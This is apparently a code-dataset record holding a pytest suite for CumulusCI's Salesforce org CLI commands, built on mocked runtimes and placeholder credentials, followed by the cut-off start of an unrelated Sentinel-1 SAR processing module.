| 31.5
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0.206349
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
6a457894946bc0c57c95dfb510c0fdd30879a585
| 40,303
|
py
|
Python
|
cumulusci/cli/tests/test_org.py
|
sfdcale/CumulusCI
|
96ba7350653c8ed4cd0cb7949d85b77e2acb25fe
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/cli/tests/test_org.py
|
sfdcale/CumulusCI
|
96ba7350653c8ed4cd0cb7949d85b77e2acb25fe
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/cli/tests/test_org.py
|
sfdcale/CumulusCI
|
96ba7350653c8ed4cd0cb7949d85b77e2acb25fe
|
[
"BSD-3-Clause"
] | null | null | null |
import click
import io
import json
import pytest
import responses
from datetime import date
from datetime import datetime
from datetime import timedelta
from pathlib import Path
from unittest import mock
from contextlib import contextmanager
from cumulusci.cli import cci
from cumulusci.core.config import OrgConfig
from cumulusci.core.config import ScratchOrgConfig
from cumulusci.core.exceptions import OrgNotFound
from cumulusci.core.exceptions import ServiceNotConfigured
from cumulusci.core.exceptions import ScratchOrgException
from .. import org
from .utils import run_click_command
class TestOrgCommands:
@mock.patch("webbrowser.open")
def test_org_browser(self, browser_open):
org_config = mock.Mock()
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_browser, runtime=runtime, org_name="test", path=None, url_only=False
)
org_config.refresh_oauth_token.assert_called_once()
browser_open.assert_called_once()
org_config.save.assert_called_once_with()
@mock.patch("webbrowser.open")
def test_org_browser_path(self, browser_open):
start_url = "https://random-word-1234-dev-ed.cs42.my.salesforce.com//secur/frontdoor.jsp?sid=00Dorgid!longtoken"
target_path = "/lightning/setup/Package/home"
org_config = mock.Mock()
org_config.start_url = start_url
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_browser,
runtime=runtime,
org_name="test",
path=target_path,
url_only=False,
)
org_config.refresh_oauth_token.assert_called_once()
expected_query = "&retURL=%2Flightning%2Fsetup%2FPackage%2Fhome"
browser_open.assert_called_once_with(start_url + expected_query)
org_config.save.assert_called_once_with()
@mock.patch("click.echo")
@mock.patch("webbrowser.open")
def test_org_browser_url_only(self, browser_open, click_echo):
start_url = "https://random-word-1234-dev-ed.cs42.my.salesforce.com//secur/frontdoor.jsp?sid=00Dorgid!longtoken"
org_config = mock.Mock()
org_config.start_url = start_url
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_browser,
runtime=runtime,
org_name="test",
path=None,
url_only=True,
)
org_config.refresh_oauth_token.assert_called_once()
browser_open.assert_not_called()
click_echo.assert_called_once_with(start_url)
org_config.save.assert_called_once_with()
@mock.patch("cumulusci.cli.org.OAuth2Client")
@responses.activate
def test_org_connect(self, oauth2client):
client_instance = mock.Mock()
client_instance.auth_code_flow.return_value = {
"instance_url": "https://instance",
"access_token": "BOGUS",
"id": "OODxxxxxxxxxxxx/user",
}
oauth2client.return_value = client_instance
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mock.Mock(
client_id="asdfasdf",
client_secret="asdfasdf",
callback_url="http://localhost:8080/callback",
)
responses.add(
method="GET",
url="https://instance/services/oauth2/userinfo",
body=b"{}",
status=200,
)
responses.add(
method="GET",
url="https://instance/services/data/v45.0/sobjects/Organization/OODxxxxxxxxxxxx",
json={
"TrialExpirationDate": None,
"OrganizationType": "Developer Edition",
"IsSandbox": False,
"InstanceName": "CS420",
"NamespacePrefix": None,
},
status=200,
)
responses.add("GET", "https://instance/services/data", json=[{"version": 45.0}])
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=False,
login_url=None,
default=True,
global_org=False,
)
runtime.check_org_overwrite.assert_called_once()
runtime.keychain.set_org.assert_called_once()
org_config = runtime.keychain.set_org.call_args[0][0]
assert org_config.expires == "Persistent"
runtime.keychain.set_default_org.assert_called_once_with("test")
@contextmanager
def mock_main_context(self):
with mock.patch( # side effects break other tests
"cumulusci.cli.cci.init_logger", mock.Mock()
), mock.patch(
"cumulusci.cli.cci.get_tempfile_logger",
mock.MagicMock(return_value=(None, "")),
), mock.patch(
"cumulusci.cli.cci.tee_stdout_stderr", mock.MagicMock()
):
yield
@mock.patch("cumulusci.cli.org.connect_org_to_keychain")
@mock.patch("cumulusci.cli.cci.CliRuntime")
def test_org_connect__sandbox(self, cli_runtime, connect_to_keychain):
mocked_connected_app = mock.Mock()
mocked_connected_app.client_id = "foo"
mocked_connected_app.client_secret = "bar"
mocked_connected_app.callback_url = "https://foo.bar.baz/"
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mocked_connected_app
cli_runtime.return_value = runtime
with self.mock_main_context():
cci.main(["cci", "org", "connect", "blah", "--sandbox"])
actual_client_config = connect_to_keychain.call_args_list[0][0][0].client_config
assert actual_client_config.auth_uri.startswith("https://test.salesforce.com/")
assert actual_client_config.token_uri.startswith("https://test.salesforce.com/")
@mock.patch("cumulusci.cli.org.connect_org_to_keychain")
@mock.patch("cumulusci.cli.cci.CliRuntime")
def test_org_connect__prod_default(self, cli_runtime, connect_to_keychain):
mocked_connected_app = mock.Mock()
mocked_connected_app.client_id = "foo"
mocked_connected_app.client_secret = "bar"
mocked_connected_app.callback_url = "https://foo.bar.baz/"
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mocked_connected_app
cli_runtime.return_value = runtime
with self.mock_main_context():
cci.main(["cci", "org", "connect", "blah"])
actual_client_config = connect_to_keychain.call_args_list[0][0][0].client_config
assert actual_client_config.auth_uri.startswith("https://login.salesforce.com/")
assert actual_client_config.token_uri.startswith(
"https://login.salesforce.com/"
)
@mock.patch("cumulusci.cli.org.OAuth2Client")
@responses.activate
def test_org_connect_expires(self, oauth2client):
client_instance = mock.Mock()
client_instance.auth_code_flow.return_value = {
"instance_url": "https://instance",
"access_token": "BOGUS",
"id": "OODxxxxxxxxxxxx/user",
}
oauth2client.return_value = client_instance
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mock.Mock(
client_id="asdfasdf",
client_secret="asdfasdf",
callback_url="http://localhost:8080/callback",
)
responses.add(
method="GET",
url="https://instance/services/oauth2/userinfo",
body=b"{}",
status=200,
)
responses.add(
method="GET",
url="https://instance/services/data/v45.0/sobjects/Organization/OODxxxxxxxxxxxx",
json={
"TrialExpirationDate": "1970-01-01T12:34:56.000+0000",
"OrganizationType": "Developer Edition",
"IsSandbox": True,
"InstanceName": "CS420",
"NamespacePrefix": None,
},
status=200,
)
responses.add("GET", "https://instance/services/data", json=[{"version": 45.0}])
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=True,
login_url=None,
default=True,
global_org=False,
)
runtime.check_org_overwrite.assert_called_once()
runtime.keychain.set_org.assert_called_once()
org_config = runtime.keychain.set_org.call_args[0][0]
assert org_config.expires == date(1970, 1, 1)
runtime.keychain.set_default_org.assert_called_once_with("test")
def test_org_connect_connected_app_not_configured(self):
runtime = mock.Mock()
runtime.keychain.get_service.side_effect = ServiceNotConfigured
with pytest.raises(ServiceNotConfigured):
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=True,
login_url=None,
default=True,
global_org=False,
)
def test_org_connect_lightning_url(self):
runtime = mock.Mock()
with pytest.raises(click.UsageError, match="lightning"):
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=True,
login_url="https://test1.lightning.force.com/",
default=True,
global_org=False,
)
def test_org_default(self):
runtime = mock.Mock()
run_click_command(
org.org_default, runtime=runtime, org_name="test", unset=False
)
runtime.keychain.set_default_org.assert_called_once_with("test")
def test_org_default_unset(self):
runtime = mock.Mock()
run_click_command(org.org_default, runtime=runtime, org_name="test", unset=True)
runtime.keychain.unset_default_org.assert_called_once()
@mock.patch("sarge.Command")
def test_org_import(self, cmd):
runtime = mock.Mock()
result = b"""{
"result": {
"createdDate": "1970-01-01T00:00:00.000Z",
"expirationDate": "1970-01-01",
"instanceUrl": "url",
"accessToken": "access!token",
"username": "test@test.org",
"password": "password"
}
}"""
cmd.return_value = mock.Mock(
stderr=io.BytesIO(b""), stdout=io.BytesIO(result), returncode=0
)
out = []
with mock.patch("click.echo", out.append):
run_click_command(
org.org_import,
username_or_alias="test@test.org",
org_name="test",
runtime=runtime,
)
runtime.keychain.set_org.assert_called_once()
assert "Imported scratch org: access, username: test@test.org" in "".join(out)
@mock.patch("sarge.Command")
def test_org_import__persistent_org(self, cmd):
runtime = mock.Mock()
result = b"""{
"result": {
"createdDate": null,
"instanceUrl": "url",
"accessToken": "access!token",
"username": "test@test.org",
"password": "password"
}
}"""
cmd.return_value = mock.Mock(
stderr=io.BytesIO(b""), stdout=io.BytesIO(result), returncode=0
)
out = []
with mock.patch("click.echo", out.append), pytest.raises(
click.UsageError, match="cci org connect"
):
run_click_command(
org.org_import,
username_or_alias="test@test.org",
org_name="test",
runtime=runtime,
)
def test_calculate_org_days(self):
info_1 = {
"created_date": "1970-01-01T12:34:56.789Z",
"expiration_date": "1970-01-02",
}
actual_days = org.calculate_org_days(info_1)
assert 1 == actual_days
info_7 = {
"created_date": "1970-01-01T12:34:56.789+0000",
"expiration_date": "1970-01-08",
}
actual_days = org.calculate_org_days(info_7)
assert 7 == actual_days
info_14 = {
"created_date": "1970-01-01T12:34:56.000+0000",
"expiration_date": "1970-01-15",
}
actual_days = org.calculate_org_days(info_14)
assert 14 == actual_days
info_bad__no_created_date = {"expiration_date": "1970-01-15"}
actual_days = org.calculate_org_days(info_bad__no_created_date)
assert 1 == actual_days
info_bad__no_expiration_date = {"created_date": "1970-01-01T12:34:56.000+0000"}
actual_days = org.calculate_org_days(info_bad__no_expiration_date)
assert 1 == actual_days
def test_org_info(self):
org_config = mock.Mock()
org_config.config = {"days": 1, "default": True, "password": None}
org_config.expires = date.today()
org_config.latest_api_version = "42.0"
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
with mock.patch("cumulusci.cli.org.CliTable") as cli_tbl:
run_click_command(
org.org_info, runtime=runtime, org_name="test", print_json=False
)
cli_tbl.assert_called_with(
[
["Key", "Value"],
["\x1b[1mapi_version\x1b[0m", "42.0"],
["\x1b[1mdays\x1b[0m", "1"],
["\x1b[1mdefault\x1b[0m", "True"],
["\x1b[1mpassword\x1b[0m", "None"],
],
wrap_cols=["Value"],
)
org_config.save.assert_called_once_with()
def test_org_info_json(self):
class Unserializable(object):
def __str__(self):
return "<unserializable>"
org_config = mock.Mock()
org_config.config = {"test": "test", "unserializable": Unserializable()}
org_config.expires = date.today()
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
out = []
with mock.patch("click.echo", out.append):
run_click_command(
org.org_info, runtime=runtime, org_name="test", print_json=True
)
org_config.refresh_oauth_token.assert_called_once()
assert (
'{\n "test": "test",\n "unserializable": "<unserializable>"\n}'
== "".join(out)
)
org_config.save.assert_called_once_with()
@mock.patch("cumulusci.cli.org.CliTable")
def test_org_list(self, cli_tbl):
    """`org list` splits orgs into a Scratch table and a Connected table and
    cleans up stale org cache directories."""
    runtime = mock.Mock()
    runtime.universal_config.cli__plain_output = None

    def scratch_org(name, created, username, default=False, **extra):
        # Factory for the ScratchOrgConfig fixtures used by this test.
        config = {
            "default": default,
            "scratch": True,
            "date_created": created,
            "days": 7,
            "config_name": "dev",
            "username": username,
        }
        config.update(extra)
        return ScratchOrgConfig(config, name)

    def connected_org(name, username, **extra):
        # Factory for the (non-scratch-keychain) OrgConfig fixtures.
        config = {
            "default": False,
            "scratch": False,
            "expired": False,
            "config_name": "dev",
            "username": username,
            "instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
        }
        config.update(extra)
        return OrgConfig(config, name)

    org_configs = {
        # expired scratch org (created 8 days ago with a 7 day lifespan)
        "test0": scratch_org(
            "test0",
            datetime.now() - timedelta(days=8),
            "test0@example.com",
            default=True,
        ),
        # active scratch org, day 1 of 7
        "test1": scratch_org(
            "test1",
            datetime.now(),
            "test1@example.com",
            instance_url="https://sneaky-master-2330-dev-ed.cs22.my.salesforce.com",
        ),
        "test2": connected_org("test2", "test2@example.com", expires="Persistent"),
        "test3": connected_org("test3", "test3@example.com", expires="2019-11-19"),
        "test4": connected_org("test4", "test4@example.com"),
        # OrgConfigs flagged scratch=True still land in the connected table
        "test5": connected_org(
            "test5", "test5@example.com", scratch=True, expires="2019-11-19"
        ),
        "test6": connected_org("test6", "test6@example.com", scratch=True),
    }
    runtime.keychain.list_orgs.return_value = list(org_configs)
    runtime.keychain.get_org = lambda orgname: org_configs[orgname]
    runtime.project_config.cache_dir = Path("does_not_possibly_exist")
    runtime.keychain.get_default_org.return_value = (
        "test0",
        scratch_org(
            "test0",
            datetime.now() - timedelta(days=8),
            "test0@example.com",
            default=True,
        ),
    )

    run_click_command(org.org_list, runtime=runtime, json_flag=False, plain=False)

    scratch_table_call = mock.call(
        [
            ["Name", "Default", "Days", "Expired", "Config", "Domain"],
            ["test0", True, "7", True, "dev", ""],
            ["test1", False, "1/7", False, "dev", "sneaky-master-2330-dev-ed.cs22"],
        ],
        bool_cols=["Default"],
        title="Scratch Orgs",
        dim_rows=[0, 1],
    )
    connected_table_call = mock.call(
        [
            ["Name", "Default", "Username", "Expires"],
            ["test2", False, "test2@example.com", "Persistent"],
            ["test3", False, "test3@example.com", "2019-11-19"],
            ["test4", False, "test4@example.com", "Unknown"],
            ["test5", False, "test5@example.com", "2019-11-19"],
            ["test6", False, "test6@example.com", "Unknown"],
        ],
        bool_cols=["Default"],
        title="Connected Orgs",
        wrap_cols=["Username"],
    )
    assert scratch_table_call in cli_tbl.call_args_list
    assert connected_table_call in cli_tbl.call_args_list
    runtime.keychain.cleanup_org_cache_dirs.assert_called_once()
@mock.patch("cumulusci.cli.org.click.echo")
def test_org_list__json(self, echo):
    """`org list --json` echoes a single JSON document describing every org."""
    runtime = mock.Mock()
    runtime.universal_config.cli__plain_output = None

    def scratch_org(name, created, username, default=False, **extra):
        # Factory for the ScratchOrgConfig fixtures used by this test.
        config = {
            "default": default,
            "scratch": True,
            "date_created": created,
            "days": 7,
            "config_name": "dev",
            "username": username,
        }
        config.update(extra)
        return ScratchOrgConfig(config, name)

    org_configs = {
        # expired scratch org (created 8 days ago with a 7 day lifespan)
        "test0": scratch_org(
            "test0",
            datetime.now() - timedelta(days=8),
            "test0@example.com",
            default=True,
        ),
        # active scratch org, day 1 of 7
        "test1": scratch_org(
            "test1",
            datetime.now(),
            "test1@example.com",
            instance_url="https://sneaky-master-2330-dev-ed.cs22.my.salesforce.com",
        ),
        # persistent connected org
        "test2": OrgConfig(
            {
                "default": False,
                "scratch": False,
                "expires": "Persistent",
                "expired": False,
                "config_name": "dev",
                "username": "test2@example.com",
                "instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
            },
            "test2",
        ),
    }
    runtime.keychain.list_orgs.return_value = list(org_configs)
    runtime.keychain.get_org = lambda orgname: org_configs[orgname]
    runtime.project_config.cache_dir = Path("does_not_possibly_exist")
    runtime.keychain.get_default_org.return_value = (
        "test0",
        scratch_org(
            "test0",
            datetime.now() - timedelta(days=8),
            "test0@example.com",
            default=True,
        ),
    )

    run_click_command(org.org_list, runtime=runtime, json_flag=True, plain=False)

    expected = {
        "test0": {
            "is_default": True,
            "days": "7",
            "expired": True,
            "config": "dev",
            "domain": "",
            "is_scratch": True,
        },
        "test1": {
            "is_default": False,
            "days": "1/7",
            "expired": False,
            "config": "dev",
            "domain": "sneaky-master-2330-dev-ed.cs22",
            "is_scratch": True,
        },
        "test2": {"is_default": False, "is_scratch": False},
    }
    echo.assert_called_once_with(json.dumps(expected))
@mock.patch("click.echo")
def test_org_prune(self, echo):
    """`org prune` removes expired scratch orgs but skips shapes, active orgs,
    and persistent orgs."""
    runtime = mock.Mock()
    runtime.keychain.list_orgs.return_value = [
        "shape1",
        "shape2",
        "remove1",
        "remove2",
        "active1",
        "active2",
        "persistent",
    ]
    runtime.project_config.orgs__scratch = {"shape1": True, "shape2": True}

    def scratch_org(name, username, created, default=False):
        # Factory for the ScratchOrgConfig fixtures returned by the keychain.
        return ScratchOrgConfig(
            {
                "default": default,
                "scratch": True,
                "date_created": created,
                "days": 7,
                "config_name": "dev",
                "username": username,
            },
            name,
        )

    # get_org is called once per name, in list_orgs order.
    runtime.keychain.get_org.side_effect = [
        scratch_org(
            "shape1",
            "test0@example.com",
            datetime.now() - timedelta(days=8),
            default=True,
        ),
        scratch_org("shape2", "test1@example.com", datetime.now()),
        scratch_org("remove1", "remove1@example.com", datetime(1999, 11, 1)),
        scratch_org("remove2", "remove2@example.com", datetime(1999, 11, 1)),
        scratch_org(
            "active1", "active1@example.com", datetime.now() - timedelta(days=1)
        ),
        scratch_org(
            "active2", "active2@example.com", datetime.now() - timedelta(days=1)
        ),
        OrgConfig(
            {
                "default": False,
                "scratch": False,
                "expires": "Persistent",
                "expired": False,
                "config_name": "dev",
                "username": "persistent@example.com",
                "instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
            },
            "persistent",
        ),
    ]

    run_click_command(org.org_prune, runtime=runtime, include_active=False)

    echo.assert_any_call(
        "Successfully removed 2 expired scratch orgs: remove1, remove2"
    )
    echo.assert_any_call("Skipped org shapes: shape1, shape2")
    echo.assert_any_call("Skipped active orgs: active1, active2")
    runtime.keychain.remove_org.assert_has_calls(
        [mock.call("remove1"), mock.call("remove2")]
    )
    assert runtime.keychain.remove_org.call_count == 2
@mock.patch("click.echo")
def test_org_prune_no_expired(self, echo):
    """`org prune` with no expired scratch orgs removes nothing and says so."""
    runtime = mock.Mock()
    runtime.keychain.list_orgs.return_value = [
        "shape1",
        "shape2",
        "active1",
        "active2",
        "persistent",
    ]
    runtime.project_config.orgs__scratch = {"shape1": True, "shape2": True}

    def scratch_org(name, username, created, default=False):
        # Factory for the ScratchOrgConfig fixtures returned by the keychain.
        return ScratchOrgConfig(
            {
                "default": default,
                "scratch": True,
                "date_created": created,
                "days": 7,
                "config_name": "dev",
                "username": username,
            },
            name,
        )

    # get_org is called once per name, in list_orgs order.
    runtime.keychain.get_org.side_effect = [
        scratch_org(
            "shape1",
            "test0@example.com",
            datetime.now() - timedelta(days=8),
            default=True,
        ),
        scratch_org("shape2", "test1@example.com", datetime.now()),
        scratch_org(
            "active1", "active1@example.com", datetime.now() - timedelta(days=1)
        ),
        scratch_org(
            "active2", "active2@example.com", datetime.now() - timedelta(days=1)
        ),
        OrgConfig(
            {
                "default": False,
                "scratch": False,
                "expires": "Persistent",
                "expired": False,
                "config_name": "dev",
                "username": "persistent@example.com",
                "instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
            },
            "persistent",
        ),
    ]

    run_click_command(org.org_prune, runtime=runtime, include_active=False)

    runtime.keychain.remove_org.assert_not_called()
    echo.assert_any_call("No expired scratch orgs to delete. ✨")
@mock.patch("click.echo")
def test_org_prune_include_active(self, echo):
    """`org prune --include-active` removes expired AND active scratch orgs,
    still skipping shapes and persistent orgs."""
    runtime = mock.Mock()
    runtime.keychain.list_orgs.return_value = [
        "shape1",
        "shape2",
        "remove1",
        "remove2",
        "active1",
        "active2",
        "persistent",
    ]
    runtime.project_config.orgs__scratch = {"shape1": True, "shape2": True}

    def scratch_org(name, username, created=None, default=False):
        # Factory for ScratchOrgConfig fixtures; org shapes carry no
        # date_created, so the key is only set when a timestamp is given.
        config = {
            "default": default,
            "scratch": True,
            "days": 7,
            "config_name": "dev",
            "username": username,
        }
        if created is not None:
            config["date_created"] = created
        return ScratchOrgConfig(config, name)

    # get_org is called once per name, in list_orgs order.
    runtime.keychain.get_org.side_effect = [
        scratch_org("shape1", "test0@example.com", default=True),
        scratch_org("shape2", "test1@example.com"),
        scratch_org("remove1", "remove1@example.com", datetime(1999, 11, 1)),
        scratch_org("remove2", "remove2@example.com", datetime(1999, 11, 1)),
        scratch_org(
            "active1", "active1@example.com", datetime.now() - timedelta(days=1)
        ),
        scratch_org(
            "active2", "active2@example.com", datetime.now() - timedelta(days=1)
        ),
        OrgConfig(
            {
                "default": False,
                "scratch": False,
                "expires": "Persistent",
                "expired": False,
                "config_name": "dev",
                "username": "persistent@example.com",
                "instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
            },
            "persistent",
        ),
    ]

    run_click_command(org.org_prune, runtime=runtime, include_active=True)

    echo.assert_any_call(
        "Successfully removed 2 expired scratch orgs: remove1, remove2"
    )
    echo.assert_any_call(
        "Successfully removed 2 active scratch orgs: active1, active2"
    )
    echo.assert_any_call("Skipped org shapes: shape1, shape2")
    runtime.keychain.remove_org.assert_has_calls(
        [
            mock.call("remove1"),
            mock.call("remove2"),
            mock.call("active1"),
            mock.call("active2"),
        ]
    )
    assert runtime.keychain.remove_org.call_count == 4
def test_org_remove(self):
    """`org remove` deletes a deletable org and drops it from the keychain."""
    runtime = mock.Mock()
    org_config = mock.Mock()
    org_config.can_delete.return_value = True
    runtime.keychain.get_org.return_value = org_config

    run_click_command(
        org.org_remove, runtime=runtime, org_name="test", global_org=False
    )

    org_config.delete_org.assert_called_once()
    runtime.keychain.remove_org.assert_called_once_with("test", False)
@mock.patch("click.echo")
def test_org_remove_delete_error(self, echo):
    """A failure while deleting the org still removes it from the keychain."""
    runtime = mock.Mock()
    org_config = mock.Mock()
    org_config.can_delete.return_value = True
    # Simulate the org deletion blowing up server-side.
    org_config.delete_org.side_effect = Exception
    runtime.keychain.get_org.return_value = org_config

    run_click_command(
        org.org_remove, runtime=runtime, org_name="test", global_org=False
    )

    echo.assert_any_call("Removing org regardless.")
def test_org_remove_not_found(self):
    """Removing an unknown org surfaces a ClickException with a clear message."""
    runtime = mock.Mock()
    runtime.keychain.get_org.side_effect = OrgNotFound

    expected_message = "Org test does not exist in the keychain"
    with pytest.raises(click.ClickException, match=expected_message):
        run_click_command(
            org.org_remove, runtime=runtime, org_name="test", global_org=False
        )
def test_org_scratch(self):
    """`org scratch` creates the scratch org and sets it as the default."""
    runtime = mock.Mock()
    runtime.project_config.orgs__scratch = {"dev": {"orgName": "Dev"}}

    run_click_command(
        org.org_scratch,
        runtime=runtime,
        org_name="test",
        config_name="dev",
        days=7,
        default=True,
        devhub="hub",
        no_password=True,
    )

    runtime.check_org_overwrite.assert_called_once()
    # no_password=True is passed through as set_password=False
    runtime.keychain.create_scratch_org.assert_called_with(
        "test", "dev", 7, set_password=False
    )
    runtime.keychain.set_default_org.assert_called_with("test")
def test_org_scratch__not_default(self):
    """`org scratch` without --default creates the org but does not default it."""
    runtime = mock.Mock()
    runtime.project_config.orgs__scratch = {"dev": {"orgName": "Dev"}}

    run_click_command(
        org.org_scratch,
        runtime=runtime,
        org_name="test",
        config_name="dev",
        days=7,
        default=False,
        devhub="hub",
        no_password=True,
    )

    runtime.check_org_overwrite.assert_called_once()
    runtime.keychain.create_scratch_org.assert_called_with(
        "test", "dev", 7, set_password=False
    )
def test_org_scratch_no_configs(self):
    """`org scratch` is a usage error when the project defines no scratch configs."""
    runtime = mock.Mock()
    runtime.project_config.orgs__scratch = None

    with pytest.raises(click.UsageError):
        run_click_command(
            org.org_scratch,
            runtime=runtime,
            org_name="test",
            config_name="dev",
            days=7,
            default=True,
            devhub="hub",
            no_password=True,
        )
def test_org_scratch_config_not_found(self):
    """`org scratch` is a usage error when the named config does not exist."""
    runtime = mock.Mock()
    # Only "bogus" is defined; requesting "dev" must fail.
    runtime.project_config.orgs__scratch = {"bogus": {}}

    with pytest.raises(click.UsageError):
        run_click_command(
            org.org_scratch,
            runtime=runtime,
            org_name="test",
            config_name="dev",
            days=7,
            default=True,
            devhub="hub",
            no_password=True,
        )
def test_org_scratch_delete(self):
    """`org scratch_delete` deletes the scratch org and saves its config."""
    runtime = mock.Mock()
    org_config = mock.Mock()
    runtime.keychain.get_org.return_value = org_config

    run_click_command(org.org_scratch_delete, runtime=runtime, org_name="test")

    org_config.delete_org.assert_called_once()
    org_config.save.assert_called_once_with()
def test_org_scratch_delete_not_scratch(self):
    """`org scratch_delete` refuses to operate on a non-scratch org."""
    runtime = mock.Mock()
    runtime.keychain.get_org.return_value = mock.Mock(scratch=False)

    with pytest.raises(click.UsageError):
        run_click_command(org.org_scratch_delete, runtime=runtime, org_name="test")
@mock.patch("click.echo")
def test_org_scratch_delete_error(self, echo):
    """A ScratchOrgException during delete points the user at `org remove`."""
    runtime = mock.Mock()
    org_config = mock.Mock()
    org_config.delete_org.side_effect = ScratchOrgException
    runtime.keychain.get_org.return_value = org_config

    run_click_command(org.org_scratch_delete, runtime=runtime, org_name="test")

    assert "org remove" in str(echo.mock_calls)
@mock.patch("cumulusci.cli.org.get_simple_salesforce_connection")
@mock.patch("code.interact")
def test_org_shell(self, mock_code, mock_sf):
    """`org shell` opens an interactive session with sf/tooling clients bound."""
    org_config = mock.Mock(
        instance_url="https://salesforce.com", access_token="TEST"
    )
    runtime = mock.Mock()
    runtime.get_org.return_value = ("test", org_config)

    run_click_command(org.org_shell, runtime=runtime, org_name="test")

    org_config.refresh_oauth_token.assert_called_once()
    # One plain connection and one tooling-API connection are created.
    mock_sf.assert_any_call(runtime.project_config, org_config)
    mock_sf.assert_any_call(runtime.project_config, org_config, base_url="tooling")
    org_config.save.assert_called_once_with()

    mock_code.assert_called_once()
    shell_locals = mock_code.call_args[1]["local"]
    assert "sf" in shell_locals
    assert "tooling" in shell_locals
@mock.patch("runpy.run_path")
def test_org_shell_script(self, runpy):
    """`org shell --script` runs the file via runpy with sf in its globals."""
    org_config = mock.Mock(
        instance_url="https://salesforce.com", access_token="TEST"
    )
    runtime = mock.Mock()
    runtime.get_org.return_value = ("test", org_config)

    run_click_command(
        org.org_shell, runtime=runtime, org_name="test", script="foo.py"
    )

    runpy.assert_called_once()
    assert "sf" in runpy.call_args[1]["init_globals"]
    assert runpy.call_args[0][0] == "foo.py", runpy.call_args[0]
@mock.patch("cumulusci.cli.ui.SimpleSalesforceUIHelpers.describe")
def test_org_shell_describe(self, describe):
    """`org shell --python` can call the describe() helper bound in the shell."""
    org_config = mock.Mock(
        instance_url="https://salesforce.com", access_token="TEST"
    )
    runtime = mock.Mock()
    runtime.get_org.return_value = ("test", org_config)

    run_click_command(
        org.org_shell, runtime=runtime, org_name="test", python="describe('blah')"
    )

    describe.assert_called_once()
    assert "blah" in describe.call_args[0][0]
@mock.patch("cumulusci.cli.org.print")
def test_org_shell_mutually_exclusive_args(self, print):
    """Passing both --script and --python to `org shell` raises an error."""
    org_config = mock.Mock(
        instance_url="https://salesforce.com", access_token="TEST"
    )
    runtime = mock.Mock()
    runtime.get_org.return_value = ("test", org_config)

    with pytest.raises(Exception, match="Cannot specify both"):
        run_click_command(
            org.org_shell,
            runtime=runtime,
            org_name="foo",
            script="foo.py",
            python="print(config, runtime)",
        )
| 35.415641
| 120
| 0.515371
| 3,868
| 40,303
| 5.126163
| 0.089969
| 0.030412
| 0.022947
| 0.02905
| 0.832812
| 0.784799
| 0.759229
| 0.725489
| 0.698003
| 0.674047
| 0
| 0.02363
| 0.366846
| 40,303
| 1,137
| 121
| 35.44679
| 0.753351
| 0.000744
| 0
| 0.646199
| 0
| 0.001949
| 0.196817
| 0.024857
| 0
| 0
| 0
| 0
| 0.073099
| 1
| 0.036062
| false
| 0.009747
| 0.023392
| 0.000975
| 0.062378
| 0.004873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e04a34a59e3d5d5a738c01319dd27d9dc1ba2da9
| 6,091
|
py
|
Python
|
ost/s1/burst2Ard.py
|
jamesemwheeler/OSTParallel
|
166fdbcbab7c71b69aa01e81f4138c8f3599967e
|
[
"MIT"
] | null | null | null |
ost/s1/burst2Ard.py
|
jamesemwheeler/OSTParallel
|
166fdbcbab7c71b69aa01e81f4138c8f3599967e
|
[
"MIT"
] | null | null | null |
ost/s1/burst2Ard.py
|
jamesemwheeler/OSTParallel
|
166fdbcbab7c71b69aa01e81f4138c8f3599967e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from os.path import join as opj
import shutil
from ost.s1 import slc2Ard
from ost.helpers import helpers as h
def slcBurst2CohPolArd(mstFile, slvFile, logFile,
                       swath, burstMst, burstSlv,
                       outDir, fileIdMst, fileIdSlv,
                       tmpDir, prdType='GTCgamma', outResolution=20,
                       removeSlvImport=False):
    """Process one S1 SLC burst pair to ARD: H/A/alpha, backscatter, LS map
    and master/slave coherence, geocoded and moved into outDir.

    Intermediate products live in tmpDir and are cleaned up as processing
    advances; set removeSlvImport=True to also drop the slave import (keep it
    when the slave is reused as the master of the next pair).
    """

    def dim(basename):
        # BEAM-DIMAP header path for a product basename
        return '{}.dim'.format(basename)

    def export(tmpBase, suffix):
        # move the .data dir / .dim header pair from tmpDir into outDir
        shutil.move('{}.data'.format(tmpBase),
                    opj(outDir, '{}_{}.data'.format(fileIdMst, suffix)))
        shutil.move(dim(tmpBase),
                    opj(outDir, '{}_{}.dim'.format(fileIdMst, suffix)))

    # import the master burst (re-use an import left over from a prior run)
    importMst = opj(tmpDir, '{}_import'.format(fileIdMst))
